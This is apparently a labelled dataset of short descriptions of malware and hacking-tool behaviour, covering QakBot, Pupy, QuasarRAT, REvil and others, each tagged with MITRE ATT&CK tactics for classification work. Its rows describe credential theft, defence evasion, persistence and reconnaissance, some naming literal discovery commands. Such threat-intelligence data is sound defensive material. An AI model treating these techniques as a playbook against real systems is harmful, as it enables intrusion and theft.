Proton removes logs from /var/logs and /Library/logs.,['TA0005:Defense Evasion']
Proton gathers credentials for Google Chrome.,['TA0006:Credential Access']
Proton uses an encrypted file to store commands and configuration values.,['TA0005:Defense Evasion']
Proton kills security tools like Wireshark that are running.,['TA0005:Defense Evasion']
Proton removes all files in the /tmp directory.,['TA0005:Defense Evasion']
Proton prompts users for their credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
Proton gathers credentials in files for keychains.,['TA0006:Credential Access']
Proton uses a keylogger to capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Proton persists via Launch Agent.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Proton gathers credentials in files for 1password.,['TA0006:Credential Access']
Proton captures the content of the desktop with the screencapture binary.,['TA0009:Collection']
Proton modifies the tty_tickets line in the sudoers file.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Proton uses macOS' .command file type to script actions.,['TA0002:Execution']
Proton uses VNC to connect into systems.,['TA0008:Lateral Movement']
Proxysvc automatically collects data about the victim and sends it to the control server.,['TA0009:Collection']
Proxysvc can overwrite files indicated by the attacker before deleting them.,['TA0040:Impact']
Proxysvc searches the local system and gathers data.,['TA0009:Collection']
Proxysvc performs data exfiltration over the control server channel using a custom protocol.,['TA0010:Exfiltration']
Proxysvc can delete files indicated by the attacker and remove itself from disk using a batch file.,['TA0005:Defense Evasion']
Proxysvc lists files in directories.,['TA0007:Discovery']
Proxysvc lists processes running on the system.,['TA0007:Discovery']
Proxysvc gathers product names from the Registry key: HKLM\Software\Microsoft\Windows NT\CurrentVersion ProductName and the processor description from the Registry key HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProcessorNameString.,['TA0007:Discovery']
Proxysvc registers itself as a service on the victim’s machine to run as a standalone process.,['TA0002:Execution']
"Proxysvc collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.",['TA0007:Discovery']
Proxysvc collects the network adapter information and domain/username information based on current remote sessions.,['TA0007:Discovery']
"As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server.",['TA0007:Discovery']
Proxysvc uses HTTP over SSL to communicate commands with the control server.,['TA0011:Command and Control']
"Proxysvc executes a binary on the system and logs the results into a temp file by using: cmd.exe /c "" > %temp%\PM* .tmp 2>&1"" .",['TA0002:Execution']
PsExec has the ability to remotely create accounts on target systems.,['TA0003:Persistence']
PsExec can be used to download or upload a file over a network share.,['TA0008:Lateral Movement']
"PsExec, a tool that has been used by adversaries, writes programs to the ADMIN$ network share to execute commands on remote systems.",['TA0008:Lateral Movement']
Microsoft Sysinternals PsExec is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service.,['TA0002:Execution']
PsExec can leverage Windows services to escalate privileges from administrator to SYSTEM with the -s argument.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.,['TA0010:Exfiltration']
Psylo has commands to enumerate all storage devices and to find all files that start with a particular string.,['TA0007:Discovery']
Psylo has a command to download a file to the system from its C2 server.,['TA0011:Command and Control']
Psylo has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.,['TA0005:Defense Evasion']
Psylo uses HTTPS for C2.,['TA0011:Command and Control']
Pteranodon can decrypt encrypted data strings prior to using them.,['TA0005:Defense Evasion']
Pteranodon can use a dynamic Windows hashing algorithm to map API components.,['TA0005:Defense Evasion']
Pteranodon exfiltrates screenshot files to its C2 server.,['TA0010:Exfiltration']
Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.,['TA0005:Defense Evasion']
Pteranodon identifies files matching certain file extension and copies them to subdirectories it created.,['TA0007:Discovery']
Pteranodon can download and execute additional files.,['TA0011:Command and Control']
Pteranodon creates various subdirectories under %Temp%\reports\% and copies files to those subdirectories. It also creates a folder at C:\Users\\AppData\Roaming\Microsoft\store to store screenshot JPEG files.,['TA0009:Collection']
Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server.,['TA0005:Defense Evasion']
Pteranodon has used various API calls.,['TA0002:Execution']
Pteranodon copies itself to the Startup folder to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pteranodon executes functions using rundll32.exe.,['TA0005:Defense Evasion']
Pteranodon schedules tasks to invoke its components in order to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pteranodon can capture screenshots at a configurable interval.,['TA0009:Collection']
Pteranodon has the ability to use anti-detection functions to identify sandbox environments.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Pteranodon can use a malicious VBS file for execution.,['TA0002:Execution']
Pteranodon can use HTTP for C2.,['TA0011:Command and Control']
Pteranodon can use `cmd.exe` for execution on victim systems.,['TA0002:Execution']
Pupy can compress data with Zip before sending it over C2.,['TA0009:Collection']
"Pupy's default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.",['TA0011:Command and Control']
Pupy can record sound with the microphone.,['TA0009:Collection']
"Pupy can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Pupy can use Lazagne for harvesting credentials.,['TA0006:Credential Access']
Pupy has a module to clear event logs with PowerShell.,['TA0005:Defense Evasion']
Pupy can use Lazagne for harvesting credentials.,['TA0006:Credential Access']
Pupy can use Lazagne for harvesting credentials.,['TA0006:Credential Access']
Pupy can use Lazagne for harvesting credentials.,['TA0006:Credential Access']
Pupy can user PowerView to execute “net user” commands and create domain accounts.,['TA0003:Persistence']
Pupy can migrate into another process using reflective DLL injection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.",['TA0010:Exfiltration']
Pupy can walk through directories and recursively search for strings in files.,['TA0007:Discovery']
Pupy can upload and download to/from a victim machine.,['TA0011:Command and Control']
Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.,"['TA0009:Collection', 'TA0006:Credential Access']"
Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services.,"['TA0009:Collection', 'TA0006:Credential Access']"
Pupy can use Lazagne for harvesting credentials.,['TA0006:Credential Access']
Pupy can execute Lazagne as well as Mimikatz using PowerShell.,['TA0006:Credential Access']
"Pupy uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.",['TA0007:Discovery']
Pupy can user PowerView to execute “net user” commands and create local system accounts.,['TA0003:Persistence']
Pupy can interact with a victim’s Outlook session and look through folders and emails.,['TA0009:Collection']
Pupy has a built-in module for port scanning.,['TA0007:Discovery']
Pupy can list local and remote shared drives and folders over SMB.,['TA0007:Discovery']
Pupy can also perform pass-the-ticket.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Pupy has a module for loading and executing PowerShell scripts.,['TA0002:Execution']
Pupy can list the running processes and get the process ID and parent process’s ID.,['TA0007:Discovery']
"Pupy can use an add on feature when creating payloads that allows you to create custom Python scripts to perform tasks offline such as sandbox detection, adding persistence, etc.",['TA0002:Execution']
Pupy adds itself to the startup folder or adds itself to the Registry key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pupy can enable/disable RDP connection and can start a remote desktop session using a browser web socket client.,['TA0008:Lateral Movement']
Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.,['TA0009:Collection']
Pupy uses PsExec to execute a payload or commands on a remote host.,['TA0002:Execution']
Pupy has a module that checks a number of indicators on the system to determine if its running on a virtual machine.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Pupy can grab a system’s information including the OS version, architecture, etc.",['TA0007:Discovery']
Pupy has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions.,['TA0007:Discovery']
"Pupy has a built-in utility command for netstat, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.",['TA0007:Discovery']
Pupy can enumerate local information for Linux hosts and find currently logged on users for Windows hosts.,['TA0007:Discovery']
Pupy can be used to establish persistence using a systemd service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Pupy can access a connected webcam and capture pictures.,['TA0009:Collection']
Pupy can communicate over HTTP for C2.,['TA0011:Command and Control']
Pupy can use an XDG Autostart to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PyDCrypt has decrypted and dropped the DCSrv payload to disk.,['TA0005:Defense Evasion']
"PyDCrypt has modified firewall rules to allow incoming SMB, NetBIOS, and RPC connections using `netsh.exe` on remote machines.",['TA0005:Defense Evasion']
"PyDCrypt has been compiled and encrypted with PyInstaller, specifically using the --key flag during the build phase.",['TA0005:Defense Evasion']
PyDCrypt will remove all created artifacts such as dropped executables.,['TA0005:Defense Evasion']
PyDCrypt has dropped DCSrv under the `svchost.exe` name to disk.,['TA0005:Defense Evasion']
PyDCrypt has attempted to execute with PowerShell.,['TA0002:Execution']
"PyDCrypt, along with its functions, is written in Python.",['TA0002:Execution']
PyDCrypt has used netsh to find RPC connections on remote machines.,['TA0007:Discovery']
PyDCrypt has probed victim machines with whoami and has collected the username from the machine.,['TA0007:Discovery']
PyDCrypt has used `cmd.exe` for execution.,['TA0002:Execution']
PyDCrypt has attempted to execute with WMIC.,['TA0002:Execution']
"Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts.",['TA0006:Credential Access']
Pysa has extracted credentials from the password database before encrypting the files.,['TA0006:Credential Access']
Pysa has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.,['TA0040:Impact']
Pysa has the capability to stop antivirus services and disable Windows Defender.,['TA0005:Defense Evasion']
Pysa has deleted batch files after execution.,['TA0005:Defense Evasion']
Pysa has the functionality to delete shadow copies.,['TA0040:Impact']
Pysa can perform OS credential dumping using Mimikatz.,['TA0006:Credential Access']
Pysa has executed a malicious executable by naming it svchost.exe.,['TA0005:Defense Evasion']
Pysa has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.,['TA0005:Defense Evasion']
Pysa can perform network reconnaissance using the Advanced Port Scanner tool.,['TA0007:Discovery']
Pysa has used Powershell scripts to deploy its ransomware.,['TA0002:Execution']
Pysa has used Python scripts to deploy ransomware.,['TA0002:Execution']
Pysa has laterally moved using RDP connections.,['TA0008:Lateral Movement']
Pysa has used PsExec to copy and execute the ransomware.,['TA0002:Execution']
Pysa can stop services and processes.,['TA0040:Impact']
Pysa can perform network reconnaissance using the Advanced IP Scanner tool.,['TA0007:Discovery']
QUADAGENT was likely obfuscated using `Invoke-Obfuscation`.,['TA0005:Defense Evasion']
QUADAGENT uses DNS for C2 communications.,['TA0011:Command and Control']
QUADAGENT uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.,['TA0005:Defense Evasion']
QUADAGENT uses multiple protocols for its C2 server as fallback channels if communication with one is unsuccessful.,['TA0011:Command and Control']
QUADAGENT has a command to delete its Registry key and scheduled task.,['TA0005:Defense Evasion']
QUADAGENT stores a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications within a Registry key in the `HKCU` hive.,['TA0005:Defense Evasion']
QUADAGENT used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1.,['TA0005:Defense Evasion']
QUADAGENT modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.,['TA0005:Defense Evasion']
QUADAGENT uses PowerShell scripts for execution.,['TA0002:Execution']
QUADAGENT checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.,['TA0007:Discovery']
QUADAGENT creates a scheduled task to maintain persistence on the victim’s machine.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
QUADAGENT encodes C2 communications with base64.,['TA0011:Command and Control']
QUADAGENT gathers the current domain the victim system belongs to.,['TA0007:Discovery']
QUADAGENT gathers the victim username.,['TA0007:Discovery']
QUADAGENT uses VBScripts.,['TA0002:Execution']
QUADAGENT uses HTTPS and HTTP for C2 communications.,['TA0011:Command and Control']
QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine.,['TA0002:Execution']
QUIETCANARY has the ability to stage data prior to exfiltration.,['TA0009:Collection']
QUIETCANARY can use a custom parsing routine to decode the command codes and additional parameters from the C2 before executing them.,['TA0005:Defense Evasion']
QUIETCANARY can execute processes in a hidden window.,['TA0005:Defense Evasion']
QUIETCANARY can call `System.Net.HttpWebRequest` to identify the default proxy configured on the victim computer.,['TA0002:Execution']
QUIETCANARY has the ability to retrieve information from the Registry.,['TA0007:Discovery']
QUIETCANARY can base64 encode C2 communications.,['TA0011:Command and Control']
QUIETCANARY can RC4 encrypt C2 communications.,['TA0011:Command and Control']
QUIETCANARY can identify the default proxy setting on a compromised host.,['TA0007:Discovery']
QUIETCANARY can use HTTPS for C2 communications.,['TA0011:Command and Control']
QUIETEXIT can use an inverse negotiated SSH connection as part of its C2.,['TA0011:Command and Control']
QUIETEXIT can proxy traffic via SOCKS.,['TA0011:Command and Control']
QUIETEXIT can attempt to connect to a second hard-coded C2 if the first hard-coded C2 address fails.,['TA0011:Command and Control']
"QUIETEXIT has attempted to change its name to `cron` upon startup. During incident response, QUIETEXIT samples have been identified that were renamed to blend in with other legitimate files.",['TA0005:Defense Evasion']
QUIETEXIT can establish a TCP connection as part of its initial connection to the C2.,['TA0011:Command and Control']
QakBot has the ability to enumerate windows on a compromised host.,['TA0007:Discovery']
QakBot can use large file sizes to evade detection.,['TA0005:Defense Evasion']
QakBot can use advanced web injects to steal web banking credentials.,['TA0009:Collection']
QakBot can conduct brute force attacks to capture credentials.,['TA0006:Credential Access']
QakBot can use signed loaders to evade detection.,['TA0005:Defense Evasion']
QakBot can use obfuscated and encoded scripts.,['TA0005:Defense Evasion']
QakBot has collected usernames and passwords from Firefox and Chrome.,['TA0006:Credential Access']
QakBot has the ability to use DLL side-loading for execution.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"QakBot can use a variety of commands, including esentutl.exe to steal sensitive data from Internet Explorer and Microsoft Edge, to acquire information that is subsequently exfiltrated.",['TA0009:Collection']
QakBot can deobfuscate and re-assemble code strings for execution.,['TA0005:Defense Evasion']
QakBot has the ability to modify the Registry to add its binaries to the Windows Defender exclusion list.,['TA0005:Defense Evasion']
QakBot can use domain generation algorithms in C2 communication.,['TA0011:Command and Control']
QakBot can run nltest /domain_trusts /all_trusts for domain trust discovery.,['TA0007:Discovery']
"QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.",['TA0010:Exfiltration']
QakBot can move laterally using worm-like functionality through exploitation of SMB.,['TA0008:Lateral Movement']
QakBot has a module that can proxy C2 communications.,['TA0011:Command and Control']
QakBot can delete folders and files including overwriting its executable with legitimate programs.,['TA0005:Defense Evasion']
QakBot can identify whether it has been run previously on a host by checking for a specified folder.,['TA0007:Discovery']
QakBot can store its configuration information in a randomly named subkey under HKCU\Software\Microsoft.,['TA0005:Defense Evasion']
QakBot has been delivered in ZIP files via HTML smuggling.,['TA0005:Defense Evasion']
QakBot has placed its payload in hidden subdirectories.,['TA0005:Defense Evasion']
QakBot can make small changes to itself in order to change its checksum and hash value.,['TA0005:Defense Evasion']
QakBot has the ability to download additional components and malware.,['TA0011:Command and Control']
QakBot can measure the download speed on a targeted host.,['TA0007:Discovery']
The QakBot web inject module can inject Java Script into web banking pages visited by the victim.,['TA0002:Execution']
QakBot can capture keystrokes on a compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
QakBot has stored stolen emails and other data into new folders prior to exfiltration.,['TA0009:Collection']
QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.,['TA0009:Collection']
QakBot can use net localgroup to enable discovery of local groups.,['TA0007:Discovery']
QakBot has gained execution through users opening malicious attachments.,['TA0002:Execution']
QakBot has gained execution through users opening malicious links.,['TA0002:Execution']
QakBot has been packaged in ISO files in order to bypass Mark of the Web security measures.,['TA0005:Defense Evasion']
The QakBot payload has been disguised as a PNG file and hidden within LNK files using a Microsoft File Explorer icon.,['TA0005:Defense Evasion']
QakBot can modify the Registry to store its configuration information in a randomly named subkey under HKCU\Software\Microsoft.,['TA0005:Defense Evasion']
QakBot can use MSIExec to spawn multiple cmd.exe processes.,['TA0005:Defense Evasion']
QakBot can use GetProcAddress to help delete malicious strings from memory.,['TA0002:Execution']
QakBot can use net share to identify network shares for use in lateral movement.,['TA0007:Discovery']
QakBot has the ability use TCP to send or receive C2 packets.,['TA0011:Command and Control']
QakBot has hidden code within Excel spreadsheets by turning the font color to white and splitting it across multiple cells.,['TA0005:Defense Evasion']
QakBot can identify peripheral devices on targeted systems.,['TA0007:Discovery']
QakBot can use PowerShell to download and execute payloads.,['TA0002:Execution']
QakBot has the ability to check running processes.,['TA0007:Discovery']
QakBot can use process hollowing to execute its main payload.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"QakBot can inject itself into processes including explore.exe, Iexplore.exe, Mobsync.exe., and wermgr.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.,['TA0011:Command and Control']
QakBot can maintain persistence by creating an auto-run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
QakBot can use Regsvr32 to execute malicious DLLs.,['TA0005:Defense Evasion']
QakBot can identify remote systems through the net view command.,['TA0007:Discovery']
QakBot has the ability to use removable drives to spread through compromised networks.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
QakBot has used Rundll32.exe to drop malicious DLLs including Brute Ratel C4 and to enable C2 communication.,['TA0005:Defense Evasion']
QakBot has the ability to create scheduled tasks for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
QakBot can identify the installed antivirus product on a targeted system.,['TA0007:Discovery']
QakBot can enumerate a list of installed programs.,['TA0007:Discovery']
QakBot can encrypt and pack malicious payloads.,['TA0005:Defense Evasion']
QakBot has spread through emails with malicious attachments.,['TA0001:Initial Access']
QakBot has spread through emails with malicious links.,['TA0001:Initial Access']
QakBot can Base64 encode system information sent to C2.,['TA0011:Command and Control']
QakBot has the ability to capture web session cookies.,['TA0006:Credential Access']
QakBot can RC4 encrypt strings in C2 communication.,['TA0011:Command and Control']
QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
QakBot can collect system information including the OS version and domain on a compromised host.,['TA0007:Discovery']
"QakBot can use net config workstation, arp -a, `nslookup`, and ipconfig /all to gather network configuration information.",['TA0007:Discovery']
QakBot can use netstat to enumerate current network connections.,['TA0007:Discovery']
QakBot can identify the user name on a compromised system.,['TA0007:Discovery']
QakBot can identify the system time on a targeted host.,['TA0007:Discovery']
The QakBot dropper can delay dropping the payload to evade detection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
QakBot can use VBS to download and execute malicious files.,['TA0002:Execution']
QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.,['TA0011:Command and Control']
QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.,['TA0002:Execution']
QakBot can execute WMI queries to gather information.,['TA0002:Execution']
QakBot can remotely create a temporary service on a target host.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
QuasarRAT can generate a UAC pop-up Window to prompt the target user to run a command as the administrator.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
A QuasarRAT .dll file is digitally signed by a certificate from AirVPN.,['TA0005:Defense Evasion']
QuasarRAT can obtain passwords from FTP clients.,['TA0006:Credential Access']
QuasarRAT can obtain passwords from common FTP clients.,['TA0006:Credential Access']
QuasarRAT can obtain passwords from common web browsers.,['TA0006:Credential Access']
QuasarRAT can retrieve files from compromised client machines.,['TA0009:Collection']
"QuasarRAT has the ability to set file attributes to ""hidden"" to hide files from the compromised user's view in Windows File Explorer.",['TA0005:Defense Evasion']
QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 AppleWebKit/537.75.14 Version/7.0.3 Safari/7046A194A` though QuasarRAT can only be run on Windows systems.,['TA0005:Defense Evasion']
QuasarRAT can download files to the victim’s machine and execute them.,['TA0011:Command and Control']
QuasarRAT has a built-in keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
QuasarRAT has a command to edit the Registry on the victim’s machine.,['TA0005:Defense Evasion']
QuasarRAT can use TCP for C2 communication.,['TA0011:Command and Control']
QuasarRAT can use port 4782 on the compromised host for TCP callbacks.,['TA0011:Command and Control']
QuasarRAT can communicate over a reverse proxy using SOCKS5.,['TA0011:Command and Control']
If the QuasarRAT client process does not have administrator privileges it will add a registry key to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
QuasarRAT has a module for performing remote desktop access.,['TA0008:Lateral Movement']
QuasarRAT contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
QuasarRAT uses AES with a hardcoded pre-shared key to encrypt network communication.,['TA0011:Command and Control']
QuasarRAT can gather system information from the victim’s machine including the OS type.,['TA0007:Discovery']
QuasarRAT can determine the country a victim host is located in.,['TA0007:Discovery']
"QuasarRAT has the ability to enumerate the Wide Area Network IP through requests to ip-api.com, freegeoip.net, or api.ipify.org observed with user-agent string `Mozilla/5.0 Gecko/20100101 Firefox/48.0`.",['TA0007:Discovery']
QuasarRAT can enumerate the username and account type.,['TA0007:Discovery']
QuasarRAT can perform webcam viewing.,['TA0009:Collection']
QuasarRAT can launch a remote shell to execute commands on the victim’s machine.,['TA0002:Execution']
QuietSieve can collect files from a compromised host.,['TA0009:Collection']
"QuietSieve can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z.",['TA0007:Discovery']
QuietSieve has the ability to execute payloads in a hidden window.,['TA0005:Defense Evasion']
QuietSieve can download and execute payloads on a target host.,['TA0011:Command and Control']
QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 .,['TA0007:Discovery']
QuietSieve can identify and search networked drives for specific file name extensions.,['TA0007:Discovery']
QuietSieve can identify and search removable drives for specific file name extensions.,['TA0007:Discovery']
QuietSieve has taken screenshots every five minutes and saved them to the user's local Application Data folder under `Temp\SymbolSourceSymbols\icons` or `Temp\ModeAuto\icons`.,['TA0009:Collection']
QuietSieve can use HTTPS in C2 communications.,['TA0011:Command and Control']
RAPIDPULSE retrieves files from the victim system via encrypted commands sent to the web shell.,['TA0009:Collection']
"RAPIDPULSE listens for specific HTTP query parameters in received communications. If specific parameters match, a hard-coded RC4 key is used to decrypt the HTTP query paremter hmacTime. This decrypts to a filename that is then open, read, encrypted with the same RC4 key, base64-encoded, written to standard out, then passed as a response to the HTTP request.",['TA0005:Defense Evasion']
RAPIDPULSE has the ability to RC4 encrypt and base64 encode decrypted files on compromised servers prior to writing them to stdout.,['TA0005:Defense Evasion']
RAPIDPULSE is a web shell that is capable of arbitrary file read on targeted web servers to exfiltrate items of interest on the victim device.,['TA0003:Persistence']
"After decrypting itself in memory, RARSTONE downloads a DLL file from its C2 server and loads it in the memory space of a hidden Internet Explorer process. This “downloaded” file is actually not dropped onto the system.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
RARSTONE obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.,['TA0007:Discovery']
RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.,['TA0011:Command and Control']
RARSTONE uses SSL to encrypt its communication with its C2 server.,['TA0011:Command and Control']
RATANKBA performs a reflective DLL injection using a given pid.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
RATANKBA uploads and downloads information.,['TA0011:Command and Control']
RATANKBA uses the net user command.,['TA0007:Discovery']
There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form.,['TA0002:Execution']
RATANKBA lists the system’s processes.,['TA0007:Discovery']
RATANKBA uses the command reg query “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\InternetSettings”.,['TA0007:Discovery']
RATANKBA runs the net view /domain and net view commands.,['TA0007:Discovery']
"RATANKBA gathers information about the OS architecture, OS name, and OS version/Service pack.",['TA0007:Discovery']
RATANKBA gathers the victim’s IP address via the ipconfig -all command.,['TA0007:Discovery']
RATANKBA uses netstat -ano to search for specific IP address ranges.,['TA0007:Discovery']
RATANKBA runs the whoami and query user commands.,['TA0007:Discovery']
RATANKBA uses tasklist /svc to display running tasks.,['TA0007:Discovery']
RATANKBA uses HTTP/HTTPS for command and control communication.,['TA0011:Command and Control']
RATANKBA uses cmd.exe to execute commands.,['TA0002:Execution']
RATANKBA uses WMI to perform process monitoring.,['TA0002:Execution']
RCSession can bypass UAC to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
RCSession can be installed via DLL side-loading.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
RCSession can collect data from a compromised host.,['TA0009:Collection']
RCSession can use an encrypted beacon to check in with C2.,['TA0011:Command and Control']
RCSession can compress and obfuscate its strings to evade detection on a compromised host.,['TA0005:Defense Evasion']
RCSession can remove files from a targeted system.,['TA0005:Defense Evasion']
RCSession can store its obfuscated configuration file in the Registry under `HKLM\SOFTWARE\Plus` or `HKCU\SOFTWARE\Plus`.,['TA0005:Defense Evasion']
RCSession has the ability to drop additional files to an infected machine.,['TA0011:Command and Control']
RCSession has the ability to capture keystrokes on a compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
RCSession has used a file named English.rtf to appear benign on victim hosts.,['TA0005:Defense Evasion']
RCSession can write its configuration file to the Registry.,['TA0005:Defense Evasion']
RCSession has the ability to execute inside the msiexec.exe process.,['TA0005:Defense Evasion']
RCSession can use WinSock API for communication including WSASend and WSARecv.,['TA0002:Execution']
RCSession has the ability to use TCP and UDP in C2 communications.,['TA0011:Command and Control']
RCSession can identify processes based on PID.,['TA0007:Discovery']
RCSession can launch itself from a hollowed svchost.exe process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
RCSession has the ability to modify a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RCSession can capture screenshots from a compromised host.,['TA0009:Collection']
RCSession can gather system information from a compromised host.,['TA0007:Discovery']
"RCSession can gather system owner information, including user and administrator privileges.",['TA0007:Discovery']
RCSession can use HTTP in C2 communications.,['TA0011:Command and Control']
RCSession can use `cmd.exe` for execution on compromised hosts.,['TA0002:Execution']
RDAT has used DNS to communicate with the C2.,['TA0011:Command and Control']
RDAT has used encoded data within subdomains as AES ciphertext to communicate from the host to the C2.,['TA0011:Command and Control']
"RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. RDAT can also download data from the C2 which is split into 81,920-byte portions.",['TA0010:Exfiltration']
RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server.,['TA0005:Defense Evasion']
RDAT can exfiltrate data gathered from the infected system via the established Exchange Web Services API C2 channel.,['TA0010:Exfiltration']
RDAT has used HTTP if DNS C2 communications were not functioning.,['TA0011:Command and Control']
RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system.,['TA0005:Defense Evasion']
RDAT can download files via DNS.,['TA0011:Command and Control']
RDAT can use email attachments for C2 communications.,['TA0011:Command and Control']
RDAT has used Windows Video Service as a name for malicious services.,['TA0005:Defense Evasion']
RDAT has masqueraded as VMware.exe.,['TA0005:Defense Evasion']
RDAT can communicate with the C2 via subdomains that utilize base64 with character substitutions.,['TA0011:Command and Control']
RDAT can take a screenshot on the infected system.,['TA0009:Collection']
RDAT can communicate with the C2 via base32-encoded subdomains.,['TA0011:Command and Control']
RDAT can also embed data within a BMP image prior to exfiltration.,['TA0005:Defense Evasion']
RDAT can process steganographic images attached to email messages to send and receive C2 commands. RDAT can also embed additional messages within BMP images to communicate with the RDAT operator.,['TA0011:Command and Control']
RDAT has used AES ciphertext to encode C2 communications.,['TA0011:Command and Control']
"RDAT can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.",['TA0011:Command and Control']
RDAT has executed commands using cmd.exe /c.,['TA0002:Execution']
RDAT has created a service when it is installed on the victim machine.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface.,"['TA0009:Collection', 'TA0006:Credential Access']"
RDFSNIFFER has the capability of deleting local files.,['TA0005:Defense Evasion']
RDFSNIFFER has used several Win32 API functions to interact with the victim machine.,['TA0002:Execution']
REvil has encrypted C2 communications with the ECIES algorithm.,['TA0011:Command and Control']
REvil can launch an instance of itself with administrative rights using runas.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
REvil has the capability to destroy files and folders.,['TA0040:Impact']
REvil can encrypt files on victim systems and demands a ransom to decrypt the files.,['TA0040:Impact']
REvil can decode encrypted strings to enable execution of commands and payloads.,['TA0005:Defense Evasion']
REvil can connect to and disable the Symantec server on the victim's network.,['TA0005:Defense Evasion']
REvil can identify the domain membership of a compromised host.,['TA0007:Discovery']
REvil has infected victim machines through compromised websites and exploit kits.,['TA0001:Initial Access']
REvil has used encrypted strings and configuration files.,['TA0005:Defense Evasion']
REvil can exfiltrate host and malware information to C2 servers.,['TA0010:Exfiltration']
REvil can mark its binary code for deletion after reboot.,['TA0005:Defense Evasion']
REvil has the ability to identify specific files and directories that are not to be encrypted.,['TA0007:Discovery']
